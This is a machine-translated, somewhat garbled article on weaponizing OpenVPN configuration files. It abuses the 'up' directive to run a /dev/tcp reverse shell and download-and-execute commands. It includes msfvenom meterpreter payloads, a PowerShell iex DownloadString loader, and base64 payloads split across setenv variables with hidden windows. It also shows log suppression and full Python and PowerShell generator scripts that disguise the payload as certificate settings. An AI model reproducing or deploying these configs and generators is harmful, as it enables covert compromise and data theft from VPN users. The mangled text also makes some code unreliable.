Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to analyze the use of OpenVpn configuration files to counter the security exploration, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

OpenVPN is a commonly used data transmission tool for enterprises, but it is very dangerous to use untrusted ovpn files. Once it is maliciously exploited, it may lead to the disclosure of enterprise data information. The following describes how the attacker modifies the configuration file of OpenVPN to build a counteraction module that can be connected to the remote control side, so as to realize the control and management of the OpenVPN user system, and discuss the "counteraction" behavior in depth.

Brief introduction

The author describes an operation to create a bouncing Shell using an OVPN file (that is, a configuration file for OpenVpn). The core is the officially declared up command, which is often used to specify routes after TUN is enabled. In essence, it is equivalent to a process running an arbitrary script that points to.

The author gives the POC under linux.

Remote 192.168.1.245ifconfig 10.200.0.2 10.200.0.1dev tunscript-security 2up "/ bin/bash-c'/ bin/bash-I > / dev/tcp/192.168.1.218/8181 0cm'"

It also explores the feasibility of using powershell to play shell on win.

Bypass the limit that the length of the up command can only be less than 256 by using the environment variable.

It is difficult to use such a configuration file with obvious malicious commands to counter security-aware attackers.

Optimization + Ubuntu20 (with Openvpn) + win10 (OpenVpn Gui 2.4.9) [https://openvpn-gui.en.lo4d.com/windows]01 Linux

The first is the Linux platform, where the test can load the configuration directly with its own openvpn.

Openvpn-config evil.config

Since payload can be segmented with environment variables on win, it is obvious that the same can be done on linux

Imitate the common means of botnet, and encode a command that downloads Trojans and executes them with base64.

But there is no other way to remove the characteristics of `/ bin/ bash`. I looked through the official sample configuration file, then added more than 100 lines of configuration code and comments to it, and confused the cut payload variable name, disguised as a certificate-related operation.

# generatemsfvenom-p linux/x86/meterpreter_reverse_https LHOST=192.168.114.165 LPORT=8080-o a-f elf# host the launcher pepython3-m http.server 8 hours start to listenmsfconsole-r linux_listen.rc

Msf is online normally. There should be a picture here, but it is not available.

02 Win

Originally thought that win is easier to do, after all, the original text has given the call powershell poc, but. First, take a look at the call to the original text.

Up'C:\\ Windows\\ System32\\ cmd.exe / c (start% z1%-WindowStyle Hidden-EncodedCommand% A1%% B1% C1%% D1% E1% F1%% G1% H2% i1% P1% F1% G1% 11% M1% N1% P1% Q1% R1% S1% S1% S1) | |

Using the ps script of Sanwu workshop, the command took more than 20 variables to cut, and msf was sacrificed.

Msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666-f psh-reflection-o a.ps1msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666-f psh- o a.ps1msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666-f psh-net-o a.ps1

I have tried three formats, all of which are not very stable. Only the initial package, meterpreter back pot

Msfvenom-p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888-f base64

Finally, replace the original payload itself into the powershell template of cs, and decrypt the XOR of the template.

Python3-m http.server 8 hours start to listenmsfconsole-r win_listen.rc

When loading, you only need to execute this string.

Iex (New-Object Net.WebClient) .DownloadString ('http://127.0.0.1/a.ps1');a.ps1

In this way, we will successfully shorten the command to 4 paragraphs, simplify the parameters, and replace the specified mode of the parameters `-` with `/` for basic immunity, otherwise we won't be able to look down on it.

Setenv K0 xxxsetenv K1 xxxsetenv K2 xxxsetenv K3 xxxup'C:\\ Windows\\ System32\\ cmd.exe / c "(start powershell / w hidden / enc% K0%% K1% K2% K3)"'

Try it first, and it can be executed successfully, but the hidden parameter does not work, and the window of powershell flashes by.

Adding the hidden parameter directly to the powershell called through cmd / c under the cmd terminal or even under webshell should not have any flash window.

Then I realized that start was used to start a process, which is similar to the following command, but the effect is different. It is really a problem of calling mode.

Cmd.exe / c powershell / w hidden / enc% K0% K1% K2% K3%

Try to get rid of start. How about that? No, it collapsed, although the official document states that single and double quotation marks can be used, and backquotes indicate the passing parameters.

In some specific cases of gui on win alone, the parsing fails because the entire string of powershell commands is not taken as a parameter

And there will be a flash window when calling in the start way. After a random check, it is found that cmd also has a `/ b` parameter that can solve this evil flash window.

Check the error log in detail, because after executing this series of commands, the value returned is not as expected by openvpn

So openvpn thinks this is an execution failure, so kill the process and interrupt all operations.

Then add a pipe and lose the output.

Up'C:\\ Windows\\ System32\\ cmd.exe / c "(start / min / b powershell / w hidden / enc encoded_shellcode) | cmd"'

But this is still too long, it is obvious that since it is cmd and then called powershell, we actually have two opportunities to parse environment variables, so we can nest another layer of variables.

Setenv kk 'start / min / b powershell / w hidden / enc% k0%%k1%%k2%%k3%'up' C:\\ Windows\\ System32\\ cmd.exe / c "(% kk%) | cmd"'

Of course, don't forget to set the log level, otherwise the debug information will output the command to log.

# Set log file verbosity.verb 0

Final utilization

Msfvenom-p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888-f base64# is replaced into the powershell template, and then python3-m http.server 8 changes the downloaded url to base64, cuts it into four segments, and hides it in the configuration file.

All manual, huh? What a hassle. Is this also called weaponization?

Weaponization

Generate the script. It's coming.

01 Linux

Linux platform configuration file generation script

Import base64import randomimport argparsetemplate ='if it's too long, you won't let go of 'def handle_tempalte (p1, p2): return template.format (first='setenv resolv "{}"' .format (p1), second='setenv key "{}" '.format (p2), thrid='setenv client_key "{}"' .format (p3), fourth='setenv cert "{}" '.format (p4)) def encode_payload (url): file_str =' .join (random.sample ('zyxwvutsrqponmlkjihgfedcba')) 4) return str (base64.b64encode (bytes ("curl {url}-s-o / tmp/ {file_str} & & chmod + x / tmp/ {file_str} & & / tmp/ {file_str}" .format (url=url, file_str=file_str), encoding= "utf-8")) .strip ("b'") if _ name__ = = "_ main__": parser = argparse.ArgumentParser () parser.add_argument ("url") Help= "the url where to download your cat") args = parser.parse_args () evil_code = encode_payload (args.url) print ("[+] evil_code: {}" .format (evil_code)) flag = int (len (evil_code) / 4) file_content = handle_tempalte (evil_code [: flag], evil_code [flag:2*flag], evil_ Code [2 * flag:3*flag], evil_ Code [3 * flag:]) with open ("evil.config") "w") as f:f.write (file_content) print ('[*] Done! Maybe you should: msfvenom-p linux/x86/meterpreter_reverse_https LHOST=192.168.114.165 LPORT=8080-o a-f elf') 02 Win

The base64 code required for the / enc parameter in powershell is unicode.... I have no choice but to write with powershell.

Set-StrictMode-Version 2 $powershell_template = @ @ function handle_tempalte {Param ($first, $second, $thrid, $fourth) $tempalte = $tempalte.Replace ('{first}', $first) $tempalte = $tempalte.Replace ('{second}', $second) $tempalte = $tempalte.Replace ('{thrid}', $thrid) return $tempalte.Replace ('{fourth}', $fourth)} function handle_pstempalte {Param ($shellcode) return $powershell_template.Replace ('% DATA%') $shellcode)} $url = Read-Host "Please enter your download url, Ex: http://192.168.114.165/a.ps1:" $file = Read-Host "Please enter your script name, Ex: a.ps1:" $raw_payload = "iex (New-Object Net.WebClient) .DownloadString ('{url}') {file} ".replace ('{url}', $url) .replace ('{file}', $file) Write-Host $raw_payload$b64_payload = [convert]:: tobase64string ([system.text.encoding]:: unicode.getbytes ($raw_payload)) # split payload$flag = $b64_payload.length/4 $evil_ovpn = handle_tempalte $b64_payload.Substring (0PM55) .insert (0," setenv K0 ") $b64_payload.Substring ($flag,$flag). Insert (0," setenv K1 ") $b64_payload.Substring ($flag*2,$flag) .insert (0) "setenv K2") $b64_payload.Substring ($flag*3,$flag) .insert (0 "setenv K3") Out-File-FilePath.\ evil.ovpn-InputObject $evil_ovpn-Encoding utf8Write-Host "generate shellcode command: msfvenom-p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888-f base64" $shellcode = Read-Host "Please enter your shellcode:" $evil_ps = handle_pstempalte $shellcodeOut-File-FilePath.\ evil.ps1-InputObject $evil_ps-Encoding utf8Usage01 Linuxmsfvenom-p linux/x86/meterpreter_reverse_https LHOST=192.168.114.165 LPORT=8080-o a-f elfpython3 generate_linux .py http://192.168.114.165/a# host the launcher pepython3-m http.server 8percent start to listenmsfconsole-r linux_listen.rc# attacker use the evil config filesudo openvpn-- config evil.ovpn02 Winmsfvenom-p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888-f base64powershell-ep bypass-f generate_win.ps1 > Please enter your download url Ex: http://192.168.114.165/a.ps1:: http://192.168.114.165/a.ps1> Please enter your script name, Ex: a.ps1:: a.ps1 > iex (New-Object Net.WebClient) .DownloadString ('http://192.168.114.165/a.ps1'); A.ps1 > generate shellcode command: msfvenom-p windows/x64/meterpreter/reverse_https lhost=192.168.114.165 lport=8888-f base64 > Please enter your shellcode:: shellcode > [*] Done! Host your evil.ps1 by 'python3-m http.server 80' on your vps > [+] please look at evil.ovpn, and show me your SET skill# host the launcher pepython3-m http.server 8analyses start to listenmsfconsole-r win_listen.rc on how to analyze the use of OpenVpn configuration files to counter the security exploration here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.